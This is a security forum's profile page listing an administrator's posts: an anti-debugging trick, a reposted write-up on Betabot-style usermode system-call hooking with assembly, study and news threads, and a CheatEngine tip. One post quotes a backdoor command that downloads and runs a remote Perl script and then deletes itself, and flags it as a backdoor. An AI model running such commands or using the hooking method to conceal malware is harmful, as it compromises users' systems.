Jump to content

Nytro

Administrators
  • Posts

    18748
  • Joined

  • Last visited

  • Days Won

    719

Everything posted by Nytro

  1. [h=3]ShareCount As Anti-Debugging Trick[/h]In this post i will share with you an Anti-Debugging trick that is very similar to the "PAGE_EXECUTE_WRITECOPY" trick mentioned here, where we had to flag code section as writeable such that any memory write to its page(s) would force OS to change the page protection from PAGE_EXECUTE_WRITECOPY to PAGE_EXECUTE_READWRITE. But in this case we don't have to make any modifications to the code section's page protection. We will just query the process for its current working set info. Among the stuff we receive querying the working set of a process are two fields, "Shared" and "ShareCount". By default the OS assumes the memory pages of code section (Non-writable sections) should share physical memory across all process instances. This is true till one process instance commits a memory-write to the shared page. At this point the page becomes no longer shared. Thus, querying the working set of the process and inspecting the "Shared" and/or "ShareCount" fields for our Code section pages would reveal the presence of debugger, only if the debugger uses INT3 for breakpoints. To implement the trick, all you have to do is call the "QueryWorkingSet" or "QueryWorkingSetEx" functions. N.B. You can also use the "ZwQueryVirtualMemory" function with the "MemoryInformationClass" parameter set to MemoryWorkingSetList for more portable code. Code from here and demo from here. Tested on Windows 7. For any suggestions, leave me a comment or drop me a mail waliedassar@gmail.com. Sursa: waliedassar: ShareCount As Anti-Debugging Trick
  2. [h=3]Usermode System Call hooking - Betabot Style[/h] This is literally the most requested article ever, I've had loads of people messaging me about this (after the Betabot malware made it famous). I had initially decided not to do an article about it, because it was fairly undocumented and writing an article may have led to more people using it; However, yesterday someone linked me to a few blogs posting their implementations of the hook code (without explanation), so I've finally decided to go over it seeming as the code is already available. [h=2]Win32/64 System Calls[/h] System call is a term used to describe functions that do not execute code in usermode, instead they transfer execution to the kernel where the actual work is done. A good example of these is the native API (Ex: NtCreateFile\ZwCreateFile). None of the functions beginning with Nt or Zw actually do their work in usermode, they simply call into the kernel and allow the kernel mode function with the same name to do their work (ntdll!NtCreateFile calls ntoskrnl!NtCreateFile). Before entering the kernel, all native functions execute some common code, this is known as KiFastSystemCall on 32-bit windows and WOW32Reserved under WOW64 (32-bit process on 64-bit windows). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Native function call path in user mode under windows 32-bit[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Native function call path in user mode under WOW64[/TD] [/TR] [/TABLE] As is evident in both examples: Nt* functions make a call via a 32-bit pointer to KiFastSystemCall (x86) or X86SwitchTo64BitMode (WOW64). Theoretically we could just replace the pointer at SharedUserData!SystemCallStub and WOW32Reserved with a pointer to our code; However, in practice this doesn't work. SharedUserData is a shared page mapped into every process by the kernel, thus it's only writable from kernel mode. On the other hand WOW32Reserved is writable from user mode, but it exists inside the thread environment block (TEB), so in order to hook it we'd have to modify the TEB for every running thread. [h=2]KiFastSystemCall Hook[/h] Because SharedUserData is non-writable, the only other place we can target is KiFastSystemCall which is 5 byte (enough space for a 32-bit jump). Sadly that actually turned out not to be the case because the last byte, 0xC3 (retn), is needed by KiFastSystemCallRet and cannot be modified, which leaves only 4 writable bytes. The sysenter instruction is supported by all modern CPUs and is the fastest way to enter the kernel. On ancient CPUs (before sysenter was invented) an interrupt was used (int 0x2E), for compatibility it was kept in all subsequent versions of windows. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]The now obsolete KiIntSystemCall[/TD] [/TR] [/TABLE] Here you can see, KiIntSystemCall has a glorious 7 writable bytes (enough space for a 32-bit jump and some) it's also within short jump range of KiFastSystemCall. As you've probably guessed by now, we can do a 2 byte short jump from KiFastSystemCall to KiIntSystemCall and then a 32-bit jump from within KiIntSystemCall to our hook procedure. Now, what if something calls KiIntSystemCall? Well, it's unlikely but we can handle that too: The rule for the direction flag on windows is that it should always be cleared after a call (that is, a function should never assume it to still be set after making a call). We could use the first byte of KiIntSystemCall for STD (set direction flag), then use the first byte of KiFastSystemCall for CLD (clear direction flag) followed by a jump to KiIntSystemCall+1, that way our hook procedure can use the direction flag to see which calls came from which function. [h=2]WOW32Reserved Hook[/h] This is a lot simpler, either we can keep track of every thread and hook WOW32Reserved in each thread's environment block (i think this is what betabot does), or we simply overwrite X86SwitchTo64BitMode which is 7 bytes, writable from user mode, and pointed to by the WOW32Reserve field of every thread's environment block. [h=2]Dispatching[/h] Most people who write hooks are used to redirecting one function to another; however, because both of these hooks are placed on common code: every single native function will call the hook procedure. Obviously we're going to need a way to tell NtCreateFile calls from NtCreateProcess and so on, or the process is just going to crash and burn. If we dissemble the first 5 bytes of any native function it will always be "mov eax, XX", this value is the ordinal of the function within the System Service Dispatch Table (SSDT). Once the call enters the kernel, a function will use this number to identify which entry in the SSDT to call, then call it (meaning each function has a unique number). When our hook in called, the SSDT ordinal will still be in the eax register, all we need to do is gather the SSDT ordinals for all the functions we need (by disassembling the first 5 bytes), then we can compare the number in eax with the ordinal for the function we wish to intercept calls for: if it's equal we process the call, if not we just call the original code. Comparing the function ordinal with the one we want to hook could be messy, especially if we're hooking multiple functions. cmp eax, [ntcreatefile_ordinal] je ntcreatefile_hook cmp eax, [ntcreateprocess_ordinal] je ntcreateprocess_hook [...] jmp original_code This code is going to get very long and inefficient the more functions are hooked (because every kernel call is passing through this code, the system could slow down), but there's a better way. We can build an array of DWORDs in memory (assuming we just want to hook NtCreateFile & NtCreateProcess, let's say the NtCreateFile ordinal is 0x02 and NtCreateProcess ordinal is 0x04), the array would look like this: my_array+0x00 = (DWORD)NULL my_array+0x04 = (DWORD)NULL my_array+0x08 = (DWORD)ntcreatefile_hook_address my_array+0x0C = (DWORD)NULL my_array+0x10 = (DWORD)ntcreateprocess_hook_address [...] Then we could do something as simple as: lea ecx, [my_array] lea edx, [4*eax+ecx] ;edx will be &my_array[eax] cmp [edx], 0 je original_code call [edx] ;call the address pointed to by edx This is pretty much what the kernel code for calling the SSDT function by its ordinal would do. [h=2]Calling Original Code[/h] As with regular hooking, we just need to store the original code before we hook it. The only difference here is as well as pushing the parameters and calling the original code, the function's ordinal will need to be moved into the eax register. [h=2]Conclusion[/h] Feel free to ask any questions in the comments or on our forum, hopefully this post has covered everything already. Posted by TM Sursa: MalwareTech: Usermode System Call hooking - Betabot Style
  3. Salut, Ma intereseaza daca dintre voi sunt persoane la un master de securitate IT din Bucuresti. Am auzit ca ar cateva variante: 1. Politehnica: SRIC ( Securitatea Retelelor Informatice Complexe ): http://acs.pub.ro/doc/planuri%20master/ro/2011/SRIC.pdf sau MPI ( Managementul si Protectia Informatiei ): http://acs.pub.ro/doc/planuri%20master/ro/2011/MPI.pdf 2. Academia Tehnica Militara: Securitatea Tehnologiei Informatiei: MTA - Master InfoSec 3. Academia de Studii Economice: ISM (IT&C Security Master): ISM - IT&C Security Master - Informatics Security Master 4. Serviciul Roman de Informatii: Intelligence si securitate nationala (cred) Masterul de la SRI mi-a fost recomandat de doua persoane (una de la masterul MPI de la Poli si alta care nu s-a inscris la master), ca cica ar fi cel mai concret si mai bun. In primul rand, nu am gasit ce materii se fac acolo. Apoi, am gasit niste conditii jegoase: "Pe întreaga desf??urare a programului, cursan?ii vor avea statut de angaja?i ai Serviciului Român de Informa?ii, cu toate drepturile ?i obliga?iile ce decurg din acesta" , "sunt dispu?i ca, dup? finalizarea programului universitar de master la care au fost declara?i „Admis”, s? desf??oare activit??i în orice zon? a teritoriului na?ional, potrivit intereselor ?i nevoilor institu?iei", "accept?, în situa?ia în care vor fi declara?i „Admis”, interzicerea ori restrângerea exercit?rii unor drepturi ?i libert??i cet??ene?ti prev?zute de legisla?ia în vigoare", "accept? efectuarea de verific?ri asupra activit??ii ?i comportamentuluilor" etc. Sa fim seriosi. Apoi, eu ma gandesc sa dau la Poli, iar ASE-ul sa fie varianta de rezerva, in caz ca nu intru la celelalte. Mai exact, am auzit cele mai bune lucruri despre SRIC dar si MPI pare acceptabil: mai putin tehnic, dar poate util, mai business asa, nu stiu. Legat de ATM, nu prea sunt sigur, imi e frica sa nu ma trezesc cu niste conditii nesimtite, ca trebuie sa lucrez pentru ei sau mai stiu eu ce. Oricum, am vazut ca trebuie sa faci ceva "practica", care e posibil sa fie cam echivalentul a "lucrezi gratis pentru ei" pentru cateva luni si asta nu ma tenteaza. Iar ASE-ul e versiunea mai light, dupa cum stim cu totii acolo e plin de femei si as merge de placere la cursuri, problema e ca nu as invata mare lucru. Dar na, pot sa invat si in timpul liber ce ma intereseaza. Ar fi cel mai simplu de obtinut diploma, dar nu ar fi la fel de recunoscuta ca cea de la Poli. Asadar alegerea mea ar fi SRIC. Voi ce parere aveti? Daca sunt persoane care cunosc mai multe detalii, m-ar interesat: 1. Cand sunt cursurile? Weekend, seara, sau si in timpul zilei? 2. Cat de mult conteaza prezenta? Pentru ca nu o sa pot ajunge prea des pe acolo. 3. Cat de mare e stresul cu proiectele? Trebuie sa faci proiecte la care sa lucrezi secole, sau ceva mai lejer? 4. Cat de ok sunt materiile care se fac? Cum sunt predate? Bataie de joc? 5. Care dintre ele sunt la buget si care la taxa? Nu e foarte important, dar ar fi mai ok la buget, desi nu ma astept sa prind. 6. Cum e "mediul" acolo, cum sunt studentii, cum sunt cursurile etc? Nu stiu, mi-ar fi de ajutor orice informatie. Bine, cam greu sa imi schimb opinia cu SRIC, dar deocamdata e prima varianta. A doua e ASE, ca sa fie. Voi ce ziceti? Va rog sa nu comentati daca nu aveti nicio legatura cu subiectul. Thanks. Edit: Daca dau la ASE si daca intru, nu cred ca mai pot da la Poli. Deci cel mai probabil voi da doar la Poli, SRIC si MPI. Si astia de la ASE, daca esti admin, te pun sa platesti rapid taxa pe primu semestru.
  4. Salut, Ca exemplu concret, exista persoane si in staff ( nu o sa dau nume, poate ) care au ajuns aici cautand asa ceva: CQ Killer. Si ca sa vezi, au ajuns sa lucreze la firme ale caror produse le folositi voi zilnic si au invatat lucruri pe care nici nu visati sa le stiti voi vreodata. Copiii care cauta "hack-uri" sunt foarte atrasi de domeniul acesta: securitate IT, si o mare parte dintre ei, venind aici pentru tot felul de prostii ajung sa vada ca domeniul e mult mai diversificat si incep sa il exploreze. Nici mie nu mi se pare utila acea sectiune pentru ca nu ma joc. Bine, ma joc, dar ma joc doar asta: http://www.flasharcade.com/tower-defence-games/play/azgard-tower-defense.html . Daca exista incepatori pe aici le recomand sa intre pe acest link, sa descarce CheatEngine si sa incerce sa triseze la acest joc, sa schimbe suma de bani disponibila. CheatEngine cauta in memoria procesului (FlashPlayer_*) o anumita valoare, de exemplu, daca ai 123 de dolari, cauti acea valoare. E posibil sa fie mai multe date in memorie cu valoarea 123. Dar, mai cheltuiesti din bani si ramai cu 111 dolari, de exemplu. Cauti din nou, valoarea 111, Next scan, dintre variabilele pe care le gasisei deja si vei gasi adresa de memorie unde e salvat numarul de dolari pe care o vei putea schimba in 9999999. Incercati asta. Nota: e singura metoda prin care am reusit sa termin joculetul ala nenorocit. Are 100 de stagii.
  5. E prea abstract. Nu e nimic concret.
  6. How to destroy Programmer Productivity The following image about programmer productivity making its rounds on the internet: As Homer Simpson might say, it’s funny because it’s true. I haven’t figured out the secret to being productive yet, largely because I have never been consistently productive. Ever. Joel Spolsky talks about this in one of his blog posts: Sometimes I just can’t get anything done. Sure, I come into the office, putter around, check my email every ten seconds, read the web, even do a few brainless tasks like paying the American Express bill. But getting back into the flow of writing code just doesn’t happen. These bouts of unproductiveness usually last for a day or two. But there have been times in my career as a developer when I went for weeks at a time without being able to get anything done. As they say, I’m not in flow. I’m not in the zone. I’m not anywhere. I’ve read that blog post about half a dozen times now, and It still shocks me that someone who we see as an icon in the programmer community has a problem getting started. I’m glad I’m not alone. I’m not here to share any secret methods to being productive, but I can tell you what has kept me from being productive: Open Floor plans Developers arguing about Django vs. .NET Developers arguing in general A coworker coming up to me and asking, “Hey, did you get that email I sent?” Chewing. Apparently I suffer from Misophonia Not understanding the problem I’m working on Not really believing in the project Not understanding where to start Facing more than one task that needs to be complete BECAUSE THINGS ARE ON ARE RIGHT NOW Things BEING ON FIRE RIGHT NOW DROP EVERYTHING Twitter Notifications on my Phone Email pop ups Really, any pop-ups IMs My wife asking, “Hey, when you have a minute could you do X?” Long build times Noise Constant parade of people going past my desk MandoFun Wikipedia (Seriously, don’t click on any links) Hacker News The Internet in General Things that have contributed to making me productive in the past: Quiet atmosphere Quiet workspace (A private office works wonders) Understanding the next step I need to take in a project Knowing the problem space well No interruptions Seriously: No interruptions Staying off Twitter Staying off Hacker News No hardware problems Loving the project I’m working on Short build + debug time Not debating politics on the internet It’s telling that half of the things that keep me from being productive are problems I’ve created; but some of them aren’t. Like Open Office floor plans. Ultimately, each of us controls what makes us unproductive. I suck at peaceful confrontation. I either come of too strongly, or I sit there and let the other person walk all over me. I’m really not good at it at all. I don’t have any good advice for handling the external forces that contribute to not being productive, but I do know this: Whatever I can control, I should control. That means: Turning off notifications on my iPhone (this has the added benefit of increased battery life) Giving myself a reward for 3 hours of continuous coding (usually in the form of “internet time” like checking Hacker News or twitter) Working from home when I really, really, need to get something done Investing in a good-for-the-price pair of noise canceling headphones Scheduling ‘no meeting’ times on my calendar. These are times shown as busy to everyone else. It’s my work time. Not getting into programmer arguments around the office; people have strong opinions, and the programmers who have arguments love to argue. If there’s an actual business problem that needs to be solved, let’s grab a conference room and come up with the advantages and disadvantages of each approach. Let’s get some data. Let’s not just argue. Position my desk in such a way that passersby aren’t distracting. taking a first pass at the problem, and *then* asking another developer to walk me through the problem so that I can get a better understanding of what to do. This accomplishes two things: First, it allows me to get the ‘lay of the land’ so that I’ll at least have a basic understanding of the forces at work, and Second it allows me to ask more intelligent questions when I ask for help What makes you unproductive, and what do you do to combat it? Sursa: How to destroy Programmer Productivity | George Stocker
  7. Parlamentul Romaniei adopta prezenta lege. Download: http://www.cdep.ro/proiecte/2014/200/60/3/pl263.pdf
  8. E gratuita placa de dezvoltare? Si senzori? Si SDK?
  9. Pentru cei interesati de cazare, dati un search aici: Booking.com: 504,478 hotels worldwide. 32+ million hotel reviews. . E ok daca va strangeti mai multi, sa veniti in grup. Puteti cauta camere cu doua paturi. PS: Cautati pensiuni. Pentru 5 nopti de cazare, la pensiune, dati sub 500 RON. La hostel e mult mai putin dar si conditiile sunt altfel.
  10. Hex Workshop, HxD, Hex Editor Neo si inca alte 2 milioane de hex editoare. Dar nu asta conteaza, conteaza daca stii ce sa faci cu el. Si nu cred ca o sa stii. Apoi, ce vrei tu sa faci cu Pony?
  11. Descriere: http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet Autor: sickness (roman, fost membru RST)
  12. Da, este backdoor. @halucin0g3n aka Castiel, asteptam niste explicatii.
  13. Firefox can't find the server at zobnet.go.ro. Da: cd /var/tmp;mkdir test; echo 'wget zobnet.go.ro/perl.pl perl perl.pl rm perl* rm a' > a; bash a & Pare backdoor. Asteptam un mesaj de la nenea de mai sus cu niste explicatii. Link removed.
  14. De venit sigur vin. De prezentat, am niste idei, dar trebuie sa vorbesc cu Andrei. Vor veni multi de pe RST. Anul trecut am fost o gramada, mare parte din staff, multi VIPi... O sa ne cunoastem.
  15. Da. Am inceput aseara sa lucrez la un proiect. Avem nevoie de hosting pentru fisiere. Si care sa nu prea tina cont de drepturile de autor. Dar mai dureaza ceva pana e gata.
  16. "Si în acest an, studen?ii beneficiaz? de 50% reducere din pre?ul biletului." Mai exact 20-25 de euro. Adica 100 RON (6 pachete de tigari, 1.5-2 grame de iarba, 2 seri de bere, 5 shaorme sau ce altceva vreti voi). Cine se plange de pret primeste ban.
  17. Versiunea free nu face nimic, e de cacat. Da, am eu versiunea Pro. E ok, adica poti sa descarci o gramada de tool-uri care si merg: nmap, Nessus si multe altele. Am dat 13 RON pe ea, mai putin decat un pachet de tigari, deci nu e asa scumpa, dar nici mare lucru nu face, doar descarca niste aplicatii.
  18. [h=1]AppSecEU 2014[/h] OWASP8:52:36 OWASP6:26:05 OWASP6:46:38 OWASP9:34:39 OWASP6:22:34 OWASP6:26:17Sursa: Via: Owasp Romania
  19. Sau te angajezi la un supermarket, dai cu matura si cu mopul, 4 ore pe zi, si ca sa vezi, castigi mai mult. Topic inchis, terminati cu cacaturile astea.
  20. Comisii: Utilizarea cartelelor prepay, din 2016 doar în baza datelor personale de identificare - VIDEO de Liviu Dadacus - Mediafax Utilizarea cartelelor telefonice prepl?tite (prepay) va fi posibil?, începând cu 1 ianuarie 2016, doar dac? de?in?torul va comunica operatorului de telefonie datele personale de identificare, potrivit unei ini?iative legislative votate de Comisiile Juridic? ?i de IT din Camera Deputa?ilor. Potrivit textului de lege adoptat de deputa?ii din cele dou? Comisii, ini?iativa legislativ? urmeaz? s? intre în vigoare de la 1 ianuarie 2015, de?in?torii de cartele prepay având la dispozi?ie un an, pân? la 1 ianuarie 2016, pentru a comunica operatorului de telefonie datele personale, în caz contrar num?rul fiind anulat. Ini?iativa legislativ? reglementeaz? ?i modalitatea în care se va face conectarea la internet prin intermediul unei re?ele wi-fi, acesul urmând a fi permis în baza comunic?rii num?rului de telefon mobil pe care operatorul va trimite un SMS cu un cod de acces. Pre?edintele Comisiei IT din Camer?, deputatul Daniel Oajdea, a declarat c? ini?iativa legislativ? a fost adopat? de comisii într-o form? ”corect? ?i benefic?” pentru toat? lumea ”Proiectul de lege prevede re?inerea datelor de identificare ale persoanei, nu ?i re?inerea datelor de trafic, atât pentru prepay, cât ?i pentru wi-fi”, a spus Oajdea. El a explicat modul în care legea va reglementa acest domeniu. ”Orice om care va de?ine o cartel? prepl?tit? are la dispozi?ie, de la intrarea în vigoare a legii, un an în care poate consuma creditul sau poate s? mearg? la operator ?i s?-?i declare datele. Dac? nu, num?rul va fi anulat. Legea intr? în vigoare, dac? textul va fi adopatat a?a, la 1 ianuarie 2015. Pentru prepay se vor da datele de identificare ale persoanei din cartea de identitate, pa?aport sau permis de conducere. Referitor la accesul la internet în re?ea wi-fi, se identific? doar persoana. E procedura cunoscut? care se aplic? ?i în Germania: î?i dai num?rul de telefon mobil ?i prime?ti un cod cu care te autentifici”, a spus Oajdea. El a ar?tat c? deputa?ii nu au fost de acord cu re?inerea datelor de trafic, m?sur? care vine în contradic?ie ?i cu decizia CEDO, de?i SRI a solicitat ?i acest lucru. ”Date de trafic înseamn?, la internet, orice pagin? accesat?. Nu s-a aprobat a?a ceva, ci doar identificarea utilizatorului”, a spus Oajdea. La rândul s?u, generalul SRI Dumitru Dumbrav?, prezent la dezbaterea ini?iativei legislative în cadrul comisiilor, a evitat s? fac? declara?ii în leg?tur? cu forma în care proiectul a fost adoptat. ”Suntem mul?umi?i de faptul c? s-a votat, pentru c? am fost ni?te sus?in?tori ai legii”, a fost singurul comentariu f?cut de Dumbrav?. Comisiile Juridic? ?i de IT din Camera Deputa?ilor au elaborat, miercuri, Raport comun la proiectul de lege privind utilizarea cartelelor prepay, acesta fiind adoptat cu 14 voturi ”pentru”, 4 voturi ”împotriv?” ?i o ab?inere. Raportul va intra în dezbaterea plenului Camerei ?i va fi supus votului acestui for legislativ cel mai probabil în sesiunea extraordinar? de s?pt?mâna viitoare. Camera Deputa?ilor este for decizional. Sursa: Comisii: Utilizarea cartelelor prepay, din 2016 doar în baza datelor personale de identificare - VIDEO - Mediafax
  21. Boost::este::de::cacat(); E imensa, greu de invatat si gruparea claselor e de rahat. Recomand scrierea unor clase proprii, special pentru proiectul la care se lucreaza, clase care ulterior pot fi extrem de usor refolosite. Cu alte cuvinte, esti programator harnic o singura data, apoi poti fi unul lenes si eficient.
  22. Fraud? la vânzarea online de telefoane ?i tablete: Prejudiciu de peste 1,3 milioane de euro din TVA de Roxana Alexe - Mediafax Inspectorii antifraud? au identificat un prejudiciu de peste 1,37 milioane euro, reprezentând TVA aferent vânz?rii online de telefoane mobile inteligente ?i tablete de ultim? genera?ie, de mai multe firme, iar în urma perchezi?iilor realizate de procurorii bucure?teni ?ase persoane au fost arestate. rie 2014, a fost identificat? existen?a unui circuit de societ??i comerciale care se ocupa cu vânzarea online de telefoane mobile inteligente ?i tablete de ultim? genera?ie, organizat pe dou? paliere, informeaz? Direc?ia General? Antifraud? Fiscal? (DGAF). Primul palier era constituit din societ??i prin care produsele electronice, achizi?ionate în principal din Germania, erau introduse în România. Aceste societ??i nu declarau marfa ?i nu pl?teau taxele ?i impozitele aferente activit??ilor comerciale derulate. Totodat?, aceste firme erau înlocuite sistematic cu unele nou înfiin?ate, pe numele a diverse persoane fizice cu situa?ie material? precar?, inclusiv a unei persoane aflate la închisoare. Al doilea palier era format din firmele specializate în comer?ul online cu telefoane mobile ?i tablete, prin care erau distribuite electronicele pe pia?a româneasc?, mai spune DGAF. Urmare a aspectelor identificate, inspectorii antifraud? au sesizat, în luna martie, Parchetul de pe lâng? Tribunalul Bucure?ti. Astfel, în data de 18 iunie în baza autoriza?iilor emise de instan?a competent?, procurorii Parchetului de pe lâng? Tribunalul Bucure?ti au realizat perchezi?ii la sediile firmelor ?i la adresele persoanelor implicate, fiind descoperite sume mari de bani în numerar ?i autoturisme de lux. De asemenea, în 19 iunie, cele ?ase persoane învinuite c? au organizat ?i derulat activit??ile respective au primit mandate de arestare pentru 29 de zile. Sursa: Fraud? la vânzarea online de telefoane ?i tablete: Prejudiciu de peste 1,3 milioane de euro din TVA - Mediafax
  23. Acceptam donatii, insa nu veniti cu: dau si eu 5-10 dolari, pentru ca nu vreau ulterior sa imi sara jumatate de forum in cap ca "Ba, eu am platit pentru forum". Deocamdata ne descurcam, daca vom vrea sa ne extindem (avem idei si planuri) atunci va vom cere ajutorul.
×
×
  • Create New...